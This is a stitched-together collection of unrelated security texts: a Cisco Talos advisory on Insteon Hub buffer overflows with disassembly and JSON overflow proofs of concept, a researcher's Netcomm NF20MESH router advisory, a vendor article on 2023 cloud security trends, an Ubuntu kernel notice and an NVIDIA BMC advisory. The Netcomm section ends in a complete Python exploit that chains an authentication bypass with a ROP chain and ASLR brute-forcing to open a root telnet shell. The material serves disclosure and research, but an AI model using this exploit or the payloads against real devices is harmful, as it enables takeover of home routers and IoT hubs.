Multiple exploitable buffer overflow vulnerabilities exists in the PubNub message handler for the "control" channel of Insteon Hub running firmware version 1012. Specially crafted replies received from the PubNub service can cause buffer overflows on a global section overwriting arbitrary data. An attacker should impersonate PubNub and answer an HTTPS GET request to trigger this vulnerability. The `strcpy` at [18] overflows the buffer `insteon_pubnub.channel_al`, which has a size of 16 bytes.

**Summary**

Multiple exploitable buffer overflow vulnerabilities exists in the PubNub message handler for the “control” channel of Insteon Hub running firmware version 1012. Specially crafted replies received from the PubNub service can cause buffer overflows on a global section overwriting arbitrary data. An attacker should impersonate PubNub and answer an HTTPS GET request to trigger this vulnerability.

**Tested Versions**

Insteon Hub 2245-222 - Firmware version 1012

**Product URLs**

http://www.insteon.com/insteon-hub

**CVSSv3 Score**

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-120: Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

Insteon produces a series of devices aimed at controlling and monitoring a home: wall switches, led bulbs, thermostats, cameras, etc. One of those is Insteon Hub, a central controller which allows an end-user to use his smartphone to connect to his own house remotely and manage any other device through it. The Insteon Hub board utilizes several MCUs, the firmware in question is executed by a Microchip PIC32MX MCU, which has a MIPS32 architecture.

The firmware uses Microchip’s “Libraries for Applications” as core for the application code. Its functionality resides on a co-operative multitasking loop, which continuously executes all the existing tasks: the library already defines several tasks, e.g. for reading and sending network packets and calling the relative callbacks. Custom applications building on this library simply need to add new functions at the end of the loop, taking care of executing tasks as quickly as possible, or splitting them in several loop cycles, in order to let other tasks running smoothly.

To enable remote interaction via the Internet, Insteon Hub uses an online service called PubNub (https://www.pubnub.com/). End-users install the “Insteon for Hub” application on their smartphone. Both the smartphone application and Insteon Hub include the PubNub SDK, which allows for a bi-directional communication using PubNub’s REST API.

The interaction with PubNub happens by means of publish/subscribe methods. Each device has a series of channels it can subscribe to, in order to receive published messages. To subscribe to a specific channel it’s enough to call the function pubnub_subscribe (defined in the PubNub SDK), passing as parameter the channel name and a callback function that will be called when a message is received on the specified channel.

The device defines a function which parses messages received from PubNub on channel “control”: sub_9d053904. The function has a similar signature to the callbacks defined in PubNub’s SDK. A peculiarity of this function is that it’s only called after factory reset, in order to configure the device: a request is made to PubNub to retrieve channels and a key to use during normal operation, and PubNub should answer with a “JSON” containing these information. Example:

    - device requests: https://prod.insteon.pubnub.com/subscribe/sub-c-e1c54032-1685-11e4-b69f-02ee2ddab7fe/HUB2-112233-control/0/1234567890?uuid=HUB2-112233&auth=00112233445566778899aabbccddeeff
    - PubNub answers:
    [
      [{
        "cc": "112233-cc",
        "cc_r": "112233-cc_r",
        "ad": "112233-ad",
        "ad_r": "112233-ad_r",
        "al": "hub2-alert",
        "ak": "AABBCCDDAABBCCDDAABBCCDDAABBCCDD"
      }], "0987654321"]
    

Note that “ak” is an authentication key represented as 16 hex-encoded bytes, while “112233” corresponds to the insteon-id (lower 3 octets of the MAC address).

As we can see, PubNub answers with a “JSON” file containing 6 elements. The function sub_9d053904 simply has to parse this string and save it into a global object for later use.

    seg000:9D053904                 # void __cdecl sub_9D053904(void *pubnub_obj, int state, int http_code, char *channel, char *response, char *msgid, void *cb_data)
    seg000:9D053904                 sub_9d053904:
    seg000:9D053904
    seg000:9D053904                 src     = -0x48
    seg000:9D053904                 var_44  = -0x44
    seg000:9D053904                 var_40  = -0x40
    seg000:9D053904                 var_38  = -0x38
    seg000:9D053904                 pubnub_obj= -0x34
    seg000:9D053904                 channel_cc_ptr= -0x30
    seg000:9D053904                 var_28  = -0x28
    seg000:9D053904                 var_24  = -0x24
    seg000:9D053904                 var_20  = -0x20
    seg000:9D053904                 var_1C  = -0x1C
    seg000:9D053904                 var_18  = -0x18
    seg000:9D053904                 var_14  = -0x14
    seg000:9D053904                 var_10  = -0x10
    seg000:9D053904                 var_C   = -0xC
    seg000:9D053904                 var_8   = -8
    seg000:9D053904                 var_4   = -4
    seg000:9D053904                 response=  0x10
    seg000:9D053904                 msgid   =  0x14
    seg000:9D053904                 cb_data =  0x18
    seg000:9D053904
    seg000:9D053904 000 A8 FF BD 27         addiu   $sp, -0x58
    ...
    seg000:9D053930 058 21 80 80 00         move    $s0, $a0                       # [1]
    ...
    seg000:9D053938 058 68 00 B2 8F         lw      $s2, 0x58+response($sp)        # [2]
    ...
    seg000:9D05397C 058 00 00 42 82         lb      $v0, 0($s2)
    seg000:9D053980 058 94 00 40 50         beqzl   $v0, loc_9D053BD4              # [3]
    ...
    seg000:9D053988 058 B7 43 41 0F         jal     cJSON_Parse                    # [4]
    seg000:9D05398C 058 21 20 40 02         move    $a0, $s2
    seg000:9D053990 058 21 90 40 00         move    $s2, $v0
    seg000:9D053994 058 21 20 40 00         move    $a0, $v0
    seg000:9D053998 058 08 9D 05 3C         lui     $a1, 0x9D08
    seg000:9D05399C 058 F3 43 41 0F         jal     cJSON_GetObjectItem            # [5]
    seg000:9D0539A0 058 3C 9D A5 24         la      $a1, aCc                       # "cc"
    seg000:9D0539A4 058 21 A8 40 00         move    $s5, $v0
    seg000:9D0539A8 058 21 20 40 02         move    $a0, $s2
    seg000:9D0539AC 058 08 9D 05 3C         lui     $a1, 0x9D08
    seg000:9D0539B0 058 F3 43 41 0F         jal     cJSON_GetObjectItem            # [6]
    seg000:9D0539B4 058 40 9D A5 24         la      $a1, aCc_r                     # "cc_r"
    seg000:9D0539B8 058 21 B8 40 00         move    $s7, $v0
    seg000:9D0539BC 058 21 20 40 02         move    $a0, $s2
    seg000:9D0539C0 058 08 9D 05 3C         lui     $a1, 0x9D08
    seg000:9D0539C4 058 F3 43 41 0F         jal     cJSON_GetObjectItem            # [7]
    seg000:9D0539C8 058 48 9D A5 24         la      $a1, aAd                       # "ad"
    seg000:9D0539CC 058 21 B0 40 00         move    $s6, $v0
    seg000:9D0539D0 058 21 20 40 02         move    $a0, $s2
    seg000:9D0539D4 058 08 9D 05 3C         lui     $a1, 0x9D08
    seg000:9D0539D8 058 F3 43 41 0F         jal     cJSON_GetObjectItem            # [8]
    seg000:9D0539DC 058 4C 9D A5 24         la      $a1, aAd_r                     # "ad_r"
    seg000:9D0539E0 058 21 F0 40 00         move    $fp, $v0
    seg000:9D0539E4 058 21 20 40 02         move    $a0, $s2
    seg000:9D0539E8 058 08 9D 05 3C         lui     $a1, 0x9D08
    seg000:9D0539EC 058 F3 43 41 0F         jal     cJSON_GetObjectItem            # [9]
    seg000:9D0539F0 058 54 9D A5 24         la      $a1, aAl                       # "al"
    seg000:9D0539F4 058 20 00 A2 AF         sw      $v0, 0x58+var_38($sp)
    seg000:9D0539F8 058 21 20 40 02         move    $a0, $s2
    seg000:9D0539FC 058 08 9D 05 3C         lui     $a1, 0x9D08
    seg000:9D053A00 058 F3 43 41 0F         jal     cJSON_GetObjectItem            # [10]
    seg000:9D053A04 058 58 9D A5 24         la      $a1, aAk                       # "ak"
    seg000:9D053A08 058 67 00 A0 12         beqz    $s5, loc_9D053BA8
    seg000:9D053A0C 058 21 A0 40 00         move    $s4, $v0
    seg000:9D053A10 058 66 00 E0 52         beqzl   $s7, loc_9D053BAC
    seg000:9D053A14 058 A4 00 05 8E         lw      $a1, pubnub.channel($s0)
    seg000:9D053A18 058 64 00 C0 52         beqzl   $s6, loc_9D053BAC
    seg000:9D053A1C 058 A4 00 05 8E         lw      $a1, pubnub.channel($s0)
    seg000:9D053A20 058 61 00 C0 13         beqz    $fp, loc_9D053BA8
    seg000:9D053A24 058 20 00 A2 8F         lw      $v0, 0x58+var_38($sp)
    seg000:9D053A28 058 60 00 40 50         beqzl   $v0, loc_9D053BAC
    seg000:9D053A2C 058 A4 00 05 8E         lw      $a1, pubnub.channel($s0)
    seg000:9D053A30 058 5E 00 80 52         beqzl   $s4, loc_9D053BAC
    seg000:9D053A34 058 A4 00 05 8E         lw      $a1, pubnub.channel($s0)
    seg000:9D053A38 058 32 E2 41 0F         jal     strlen
    seg000:9D053A3C 058 10 00 A4 8E         lw      $a0, 0x10($s5)                 # [11]
    seg000:9D053A40 058 21 80 40 00         move    $s0, $v0
    seg000:9D053A44 058 32 E2 41 0F         jal     strlen
    seg000:9D053A48 058 10 00 C4 8E         lw      $a0, 0x10($s6)                 # [12]
    seg000:9D053A4C 058 21 80 02 02         addu    $s0, $v0
    seg000:9D053A50 058 02 00 10 26         addiu   $s0, 2
    seg000:9D053A54 058 20 00 10 2E         sltiu   $s0, 32                        # [13]
    seg000:9D053A58 058 48 00 00 12         beqz    $s0, loc_9D053B7C
    ...
    seg000:9D053A8C 058 48 00 22 26         addiu   $v0, $s1, insteon_pubnub.channel_cc
    seg000:9D053A90 058 28 00 A2 AF         sw      $v0, 0x58+channel_cc_ptr($sp)
    seg000:9D053A94 058 21 20 40 00         move    $a0, $v0                 
    seg000:9D053A98 058 1F DF 41 0F         jal     strcpy                         # [14]
    seg000:9D053A9C 058 10 00 A5 8E         lw      $a1, 0x10($s5)
    seg000:9D053AA0 058 58 00 35 26         addiu   $s5, $s1, insteon_pubnub.channel_ad
    seg000:9D053AA4 058 21 20 A0 02         move    $a0, $s5
    seg000:9D053AA8 058 1F DF 41 0F         jal     strcpy                         # [15]
    seg000:9D053AAC 058 10 00 C5 8E         lw      $a1, 0x10($s6)
    seg000:9D053AB0 058 68 00 36 26         addiu   $s6, $s1, insteon_pubnub.channel_cc_r
    seg000:9D053AB4 058 21 20 C0 02         move    $a0, $s6
    seg000:9D053AB8 058 1F DF 41 0F         jal     strcpy                         # [16]
    seg000:9D053ABC 058 10 00 E5 8E         lw      $a1, 0x10($s7)
    seg000:9D053AC0 058 78 00 37 26         addiu   $s7, $s1, insteon_pubnub.channel_ad_r
    seg000:9D053AC4 058 21 20 E0 02         move    $a0, $s7
    seg000:9D053AC8 058 1F DF 41 0F         jal     strcpy                         # [17]
    seg000:9D053ACC 058 10 00 C5 8F         lw      $a1, 0x58+src($fp)
    seg000:9D053AD0 058 88 00 30 26         addiu   $s0, $s1, insteon_pubnub.channel_al
    seg000:9D053AD4 058 21 20 00 02         move    $a0, $s0
    seg000:9D053AD8 058 20 00 A2 8F         lw      $v0, 0x58+var_38($sp)
    seg000:9D053ADC 058 1F DF 41 0F         jal     strcpy                         # [18]
    seg000:9D053AE0 058 10 00 45 8C         lw      $a1, 0x10($v0)
    seg000:9D053AE4 058 D8 00 33 26         addiu   $s3, $s1, insteon_pubnub.channel_ak
    seg000:9D053AE8 058 21 20 60 02         move    $a0, $s3
    seg000:9D053AEC 058 1F DF 41 0F         jal     strcpy                         # [19]
    seg000:9D053AF0 058 10 00 85 8E         lw      $a1, 0x10($s4)
    

The function stores at \[1\] the pointer to pubnub_obj, which contains data used to communicate with the remote PubNub servers. At \[2\] PubNub’s answer is saved into $s2 and at \[3\] the code ensures that the answer is not empty. The answer is then passed to cJSON_Parse \[4\] and the resulting cJSON object is saved in $s2.

The function then retrieves every expected element from the “JSON” (\[5\], \[6\], \[7\], \[8\], \[9\], \[10\]) and ensures that they exist. Each parameter is then copied into the global insteon_pubnub structure (which is at 0xa000d1bc) for later use. Note this structure is bigger than 0x1000 bytes and includes not only strings and callbacks pointers, but also 3 pubnub structures that again contain several string and function pointers. This clearly makes this buffer a good target for exploitation.

As we can see at \[14\], \[15\], \[16\], \[17\], \[18\], \[19\], each parameter is copied unsafely using strcpy and this might be used by an attacker to overwrite portions of the insteon_pubnub structure and execute arbitrary code.

However, despite the fact that the strcpy calls at \[14\] and \[15\] are unsafe, they turn out to be not exploitable, give the restriction imposed at \[13\]: the sum of the length of “cc” \[11\] and “ad” \[12\] must not exceed 29. This still allows for an overflow to occur but it will only overwrite a few bytes in the insteon_pubnub structure that an attacker already normally controls.

The following is a list of vulnerable strcpy calls and their Proof-of-Concept. Each PoC shows only the payload portion of the request and uses the placeholder “OVERFLOW” to highlight the vulnerable parameter, which can be replaced with "A"*0x400 to make the device crash. A key with value “x” means that its value is irrelevant.

**CVE-2017-14452 - “cc\_r” element**

The strcpy at \[16\] overflows the buffer insteon_pubnub.channel_cc_r, which has a size of 16 bytes. An attacker can send an arbitrarily long “cc\_r” parameter \[6\] in order to exploit this vulnerability:

    [[{"cc":"x","cc_r":"{OVERFLOW}","ad":"x","ad_r":"x","al":"x","ak":"x"}],"1"]
    

**CVE-2017-14453 - “ad\_r” element**

The strcpy at \[17\] overflows the buffer insteon_pubnub.channel_ad_r, which has a size of 16 bytes. An attacker can send an arbitrarily long “ad\_r” parameter \[8\] in order to exploit this vulnerability:

    [[{"cc":"x","cc_r":"x","ad":"x","ad_r":"{OVERFLOW}","al":"x","ak":"x"}],"1"]
    

**CVE-2017-14454 - “al” element**

The strcpy at \[18\] overflows the buffer insteon_pubnub.channel_al, which has a size of 16 bytes. An attacker can send an arbitrarily long “al” parameter \[9\] in order to exploit this vulnerability:

    [[{"cc":"x","cc_r":"x","ad":"x","ad_r":"x","al":"{OVERFLOW}","ak":"x"}],"1"]
    

**CVE-2017-14455 - “ak” element**

The strcpy at \[19\] overflows the buffer insteon_pubnub.channel_ak, which has a size of 16 bytes. An attacker can send an arbitrarily long “ak” parameter \[10\] in order to exploit this vulnerability:

    [[{"cc":"x","cc_r":"x","ad":"x","ad_r":"x","al":"x","ak":"{OVERFLOW}"}],"1"]
    

**Timeline**

2017-12-05 - Vendor Disclosure  
2018-01-18 - Vendor advised issues under evaluation  
2018-02-12 - 60 day follow up with vendor  
2018-03-09 - Vendor advised working on course of action  
2018-04-06 - Follow up with vendor on fix/timeline  
2018-04-12 - Vendor advised issues addressed & plan for beta testing  
2018-06-19 - Public disclosure

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2017-14454: TALOS-2017-0502 || Cisco Talos Intelligence Group

Authentication bypass in Netcomm router models NF20MESH, NF20, and NL1902 allows an unauthenticated user to access content. In order to serve static content, the application performs a check for the existence of specific characters in the URL (.css, .png etc). If it exists, it performs a "fake login" to give the request an active session to load the file and not redirect to the login page.

**Netcomm - Unauthenticated Remote Code Execution**

*   CVE-2022-4873
*   CVE-2022-4874

**Affected Devices:**

Research performed against the NF20MESH router revealed an unauthenticated remote code execution vulnerability that affects devices running firmware prior to version R6B025. The following devices have been confirmed by the vendor to be vulnerable:

*   NF20
*   NF20MESH
*   NL1902

It's possible that other devices may also be affected.

**Overview**

Netcomm produce routers for residential and small business use. At the time of writing, the Netcomm NF20Mesh router is currently recommended by Aussie Broadband when signing up for a new service with the number other Australian service providers and vendors starting to offer Netcomm routers.

Noticing that a new model had been released, I had to know if a previous 0day of mine still worked against it. Aftering promptly ordering the new model, I was quickly saddened to see that two of my bugs didn't work.

Reading through the firmware release notes, it didn't appear that my previous bugs had been found, so I was curious to know why it didn't affect it. As I was stepping through each part of the exploit chain, I noticed that some of the previous functionality I had previously abused to land my original shell had now been retired or removed.

I wanted to try and find another RCE, so I downloaded the latest firmware to try and pull out the filesystem. Unfortunately, all of the newer firmware releases were now provided in an encrypted format.

**Initial Shell**

Not having the luxury of simply running binwalk to pull out the filesystem like I did last time, I started looking for an alternative method to gain access to the device's file system. I spent a fair bit of time trying to black box the web server, looking for ping utilities and other pages that might be shelling out for command injection bugs, arbitrary file reads that could leak file contents etc.

Failing to find any obvious low hanging vulnerabilities, I decided to try and get onto the board by soldering to a UART interface:

Turning the device on, I could see the bootup process happening through the console where eventually I was asked to login. Logging into the device however dropped me into the same telnet shell which I was unable to escape out of:

Restarting the device, I interupted the boot process and added an extra kernel boot parameter:

Continuing the boot process with the r command, I was able to drop into a local shell via serial:

Finally, running the startup commands in /etc/inittab brought all the services up, allowing me to take files off the device with netcat.

**Vulnerabilities**

Having local shell access now allowed me to start looking for vulnerabilities resulting an authentication bypass and a stack-based buffer overflow to achieve unauthenticated remote code execution.

****1\. Authentication Bypasss (CVE-2022-4874):****

While reverse engineering the httpd binary, I noticed the application was performing checks against the request file extensions using the strstr() function.

If you're unfamiliar with the strstr function in C, strstr finds the first occurrence of a word/character within a string. Rather than checking if the file in the path ends with .css, .png etc, it's only checking if the presence of these values in the path are there:

After this check, and additional check is performed to ensuring that a referer is set:

If both these checks pass, the do_ej function then processes the requested file:

Playing around with the strstr() function, I was able to trick the application into thinking I was authenticated by fetching a restricted page that was prefxied with /.css/ in front of it. The strstr check passes, and then processes the request:

I'm not 100% sure as to why the extension check was written this way, but I think this is a work around for serving static content while putting everything behind authentication. In order to serve a background image for the login page, it sets the request as being in an authenticated state to be able to successfully fetch the resource.

Additionally, I noticed there is a strange unauthenticated /twgjtelnetopen.cmd route which, while returning a 404 error page, is opening up the telnet service:

Perhaps some kind of debug/tech support endpoint?

****2\. Buffer Overflow (CVE-2022-4873):****

The second step was trying to find an alternative method for getting code execution on the device.

Using checksec, I could see the httpd binary had been compiled with a non-executable stack (NX), however other exploit mitigations had not been enabled:

    gdb-peda$ checksec
    Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
    Use 'set logging enabled off'.
    
    Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
    Use 'set logging enabled on'.
    
    CANARY    : disabled
    FORTIFY   : disabled
    NX        : ENABLED
    PIE       : disabled
    RELRO     : Partial
    

I looked for cross-references to any system() calls that I might be able to hit, however was unable to find anything that looked injectable. I then looked for any cases of dangerous functions being used that might be exploitable. Fortunately, I was able to find quite a few instances of strcpy being used:

Given the number of strcpy references in the application, I wrote a small python script to starting fuzzing parameters to see if we could trigger any bugs while I performed a deeper analysis of the binary itself. After running the fuzzer, I quickly saw the following crash on my UART console:

    task: cdd0dc00 ti: caca0000 task.ti: caca0000
    PC is at 0x41414140
    LR is at 0x29218
    pc : [<41414140>]    lr : [<00029218>]    psr: 60070010
    sp : bee158c0  ip : 00000000  fp : 41414141
    r10: 41414141  r9 : 41414141  r8 : 00000000
    r7 : 41414141  r6 : 41414141  r5 : 41414141  r4 : 41414141
    r3 : 00000000  r2 : 00000000  r1 : 00000000  r0 : 00000001
    [...]
    

I could also see that I had full control over the r4, r5, r6, r7, r10 and fp registers at the time of the crash. But, most importantly, I had full control over the PC register. Unfortunately with the NX stack protections enabled, I would need to build a ROP chain in order to get a shell.

Looking through the crash I noticed another issue. The memory pages for the binary were being loaded into address ranges containing null bytes:

    Call Process maps
    00010000-0009f000 r-xp 00000000 fe:00 742        /bin/httpd
    000ae000-000af000 r--p 0008e000 fe:00 742        /bin/httpd
    000af000-000b5000 rw-p 0008f000 fe:00 742        /bin/httpd
    [...]
    

This was a problem. Even though the application itself wasn't compiled with ASLR protection, I couldn't use any gadgets in it because the presence of a null byte would terminate the payload early. All the other libraries used by the application were using the system's ASLR, which meant I was going to have to tackle the address randomization of the functions in libraries being used.

To help with getting a working exploit, I turned ASLR off on the router by running the following command:

    echo 0 > /proc/sys/kernel/randomize_va_space
    

This provided a more stable environment to help with debugging the ROP chain by not having addresses changing on me while getting it to work. After getting an exploit working with ASLR turned off, I had to now go back and get it working with it enabled. Fortunately during the debugging process of the current exploit, I noticed that the main application wasn't actually crashing. Instead, it was actually forking out a httpd service which processed the request and was crashing. Additionally, the number of bytes in the address range changing was brute forceable. I grabbed the base address of libc from a crash and calcuated where the addresses to functions would be.

Because the main process wasn't dying, I could keep issuing the same request in an infinite loop and see if I got lucky with libc being loaded again at the hardcoded base address by connecting to the telnet service:

**Exploit / TL;DR:**

If you're really unlucky, it can take up to 10-15 minutes for the exploit to finally get a hit on libc's base address. I've found on average though that somewhere between 3-5 minutes seems to be the sweet spot.

#!/usr/bin/python3
"""
Netcomm NF20MESH Unauthenticated RCE
Author: Brendan Scarvell
Vulnerable versions: <= R6B021
A stack based buffer overflow exists in the sessionKey query string parameter. An authentication bypass
was also discovered by providing /.css/ in the request path. Chaining both of the two bugs together
results in unauthenticated remote code execution.
The exploit can take up to 5-10 minutes until it gets lucky and hits the right base address for libc.
"""

import requests, telnetlib, sys, time

"""
task: cdd0dc00 ti: caca0000 task.ti: caca0000
PC is at 0x444444
LR is at 0x29218
pc : \[<00444444>\]    lr : \[<00029218>\]    psr: 60070010
sp : bee158c0  ip : 00000000  fp : 41414141
r10: 41414141  r9 : 41414141  r8 : 00000000
r7 : 41414141  r6 : 41414141  r5 : 41414141  r4 : 41414141
r3 : 00000000  r2 : 00000000  r1 : 00000000  r0 : 00000001
"""

TARGET \= "192.168.20.1"

MAX\_BUF\_SIZE \= 4140

libc\_system         \= b"%6C%89%a2%b6"   \# 0xb6a2896c

\# Gadgets
big\_pop             \= b"%40%2b%65%b6"   \# 0xb6652b40 (0x00079b40) : mov r0, r1; pop {r4, r5, r6, r7, pc};
add\_r1\_sp\_blx\_r5    \= b"%6c%79%6d%b6"   \# 0xb66d796c (0x000fe96c) : add r1, sp, #0x14; blx r5;
mov\_r0\_r1\_blx\_r3    \= b"%cc%d0%64%b6"   \# 0xb664d0cc (0x000740cc) : mov r0, r1; blx r3;
mov\_r4\_r3\_pop\_r4\_pc \= b"%7c%98%65%b6"   \# 0xb665987c mov r3, r4; mov r0, r3; pop {r4, pc}; 

\# pewpew
buf  \= b"A" \* 4096
buf += big\_pop              \# r3 => pop system() into PC
buf += mov\_r0\_r1\_blx\_r3     \# r5 => mov r1 into r0, blx to r3 to continue chain (big\_pop ^)
buf += b"B" \* ((MAX\_BUF\_SIZE \- len(buf)))                  
buf += mov\_r4\_r3\_pop\_r4\_pc  \# move r4 into r3 to continue rop chain
buf += b"CCCC"              
buf += add\_r1\_sp\_blx\_r5     \# push sp to point at command and save in r1
buf += b"D" \* 16            
buf += libc\_system          \# executed last after r0 populated
buf += b""
buf += b"sh%20-c%20%22/bin/busybox%20telnetd%20-l%20/bin/sh%20-p%2031337%22%23"     

print(f"\[\*\] payload length: {len(buf)}")

buf \= buf.decode("latin1")

\# Referer header is required in the request
headers \= {
    "Referer": f"http://{TARGET}/login.html" 
}

print("\[\*\] bruteforcing aslr. this could take a while..")

pwned \= False

\# keep repeating until the base address for libc is 0xb65d9000, allowing the gadgets + system() line up correctly

while not pwned:
    try:
        r \= requests.get(f"http://{TARGET}/.css/rtroutecfg.cgi?defaultGatewayList=ppp0.3&dfltGw6Ifc=&sessionKey={buf}", timeout\=5, headers\=headers)

    except requests.exceptions.ConnectionError:
        \# successful exploitation hangs connection. Capture timeout so we dont hang forever
        print("\\n\[\*\] got hit on libc @ 0xb65d9000")
    
    try:
        tn \= telnetlib.Telnet(TARGET, 31337)
        if (tn):
            pwned \= True
            print("\[\*\] popping shell")
            time.sleep(2)
            tn.interact()
    except:
        sys.stdout.write(".")
        sys.stdout.flush()

**Timeline**

*   16/10/22 - Requested security contact to report details to.
*   17/10/22 - Netcomm responded advising to send details in ticket to forward to engineering. Advised Netcomm of 60 day disclosure period.
*   01/11/22 - Netcomm provided updated firmware to verify patch. Advised Netcomm patch was incomplete.
*   08/11/22 - Netcomm provided another updated firmware to verify patch. Advised Netcomm issues appeared to be resolved.
*   18/11/22 - Netcomm released firmware (R6B021) with the fix to public. CVE requested through MITRE.
*   03/12/22 - Requested update from MITRE for CVE.
*   16/12/22 - Requested another update from MITRE regarding CVE.
*   27/12/22 - Advisory disclosed. CVE still pending.
*   04/01/23 - CVE-2022-4873 and CVE-2022-4874 assigned to bugs.

CVE-2022-4874: advisories/2022_netcomm_nf20mesh_unauth_rce.md at main · scarvell/advisories

Organizations are looking for new methods to safeguard the virtual machines, containers, and workload services they use in the cloud.

In 2022, we saw explosive transitions in the cloud security market — every aspect of the ecosystem, including vendors, products, and infrastructure, went through a radical change. It birthed new categories like data security posture management (DSPM), saw established vendors jumping to announce cloud data lakes like Amazon Security Lake, and put vendors through turmoil, like KnowBe4 being acquired by Vista Equity for $4.3 billion.

As we look forward to 2023, cybersecurity for workloads (virtual machines, containers, services) in the public cloud will continue to evolve, with customers trying to balance the need for aggressive cloud adoption and compliance with security needs. CIOs and CISOs will challenge their teams to build the foundation for a security platform that can consolidate point products, support multiple clouds (AWS, Azure, and GCP), and leverage automation to scale security operations. A zero-trust architecture will lead the way to workload protection in the cloud, real-time data protection, and centralized policy enforcement. Here’s a deeper dive into how these five dynamics will make their presence felt in 2023 with public cloud workloads.

**Generative Attacks Will Become Targeted and Personalized**

Automation and machine learning empower cybercriminals to launch sophisticated, targeted attacks. Scripted botnets can conduct network reconnaissance on cloud infrastructure, and valuable data can be harvested and used to launch further attacks. Malware packages are becoming a commodity, with readily available automated tools in which the level of abstraction enables even unimaginative minds to become lethal. For example, ChatGPT, which has taken the tech world by storm, can use machine learning to auto-script malware.

Cyberthreat researcher @lordx64 shared an example of malware auto-generated by ChatGPT. The malware used PowerShell to download ransomware using an obfuscation script, encrypt all the files, and exfiltrate the key to google.com.

**Centralized Security Posture Will Become the Norm to Tackle Workload Sprawl**

Misconfigurations due to human error remain the biggest root cause of cyberattacks. Many attacks use techniques such as code injection and buffer overflow to prey on weak configurations. With the cloud enabling workloads to be spun up and down frequently, configuring security policies at individual firewalls at every virtual private cloud (or a trust zone) opens the door for human error.

Organizations will increasingly look for architectures that can centralize cloud security policy definitions, enforcements, and remediations. Only when cyber prevention is delivered from a central platform can defense be applied to all workloads, instead of just a few select ones.

**Zero-Trust For Workload Protection Will Gain Momentum**

Zero trust will see widespread adoption to protect assets by enforcing an explicit trust framework for all assets in the public cloud. Implementing zero trust in the public cloud is different and unique because customers are dealing with ephemeral and dynamic resources. With zero trust platforms that were architectured for the cloud can bring down cost overruns and complexity. Before a workload in a public cloud can request a resource, it must go through an extensive trust check — one that combines identity, device risk, location, threat intelligence, behavioral analytics, and context. Upon successfully establishing explicit trust, the resource will then be subject to corporate security policy for access control.

**CIOs Will Look For More Effective Multicloud Security Tools**

When it comes to vendor best practices, CIOs are increasingly looking at diversified portfolios of public cloud infrastructure for three main reasons. They want to reduce reliance on a single vendor; many are also looking to integrate infrastructure inherited from mergers and acquisitions. And CIOs need to leverage best-of-breed services from different vendors, such as Google Cloud BigQuery for data analytics, AWS for mobile apps, Oracle Cloud for ERP, for example.

    

Figure: AWS shared responsibility model for protecting cloud resources.

Every cloud vendor preaches the notion of “shared security responsibility,” putting the onus on the customer to implement a security infrastructure for their cloud resources. Savvy IT shops ensure they pick a cybersecurity platform that supports multiple public cloud environments.

**Real-Time Data Protection Will Be a Core Criterion for Cloud Data Governance, Security**

Securing sensitive data such as protected health information, personally identifying information, financial information, patents, confidential corporate data, and other intellectual property is arduous when data moves to the cloud. Legacy data loss prevention (DLP) architectures that rely on regexes, scans, and static rules are insufficient and ineffective for DLP in the cloud.

The rise of the data security posture management category has provided critical visibility into the need for observability and real-time analysis. Proxy-based architectures that can decrypt and inspect all SSL traffic will become a cornerstone for enterprises that truly care about protecting their sensitive data.

Migration to the cloud is not a new trend in the corporate world, but the implications of cybersecurity for cloud workloads are still evolving. While there are no clear answers yet, these are some of the leading indicators customers will use to navigate in 2023.

Read more _Partner Perspectives_ from Zscaler.

5 Ways Cybersecurity for Cloud Workloads Will Evolve in 2023

Ubuntu Security Notice 5799-1 - Kyle Zeng discovered that the sysctl implementation in the Linux kernel contained a stack-based buffer overflow. A local attacker could use this to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5799-1January 11, 2023linux-oem-5.17, linux-oem-6.0 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-oem-5.17: Linux kernel for OEM systems- linux-oem-6.0: Linux kernel for OEM systemsDetails:Kyle Zeng discovered that the sysctl implementation in the Linux kernelcontained a stack-based buffer overflow. A local attacker could use this tocause a denial of service (system crash) or execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.17.0-1026-oem     5.17.0-1026.27   linux-image-6.0.0-1010-oem      6.0.0-1010.10   linux-image-oem-22.04           5.17.0.1026.24   linux-image-oem-22.04a          5.17.0.1026.24   linux-image-oem-22.04b          6.0.0.1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5799-1   CVE-2022-4378Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1026.27   https://launchpad.net/ubuntu/+source/linux-oem-6.0/6.0.0-1010.10

Ubuntu Security Notice USN-5799-1

NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution

**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2022‑42271

NVIDIA baseboard management controller (BMC) contains a vulnerability in the Intelligent Platform Management Interface (IPMI) handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

8.4

AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42272

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to code execution, denial of service, or escalation of privileges.

8.1

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42273

NVIDIA BMC contains a vulnerability in libwebsocket, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

8.1

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVE‑2022‑42274

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

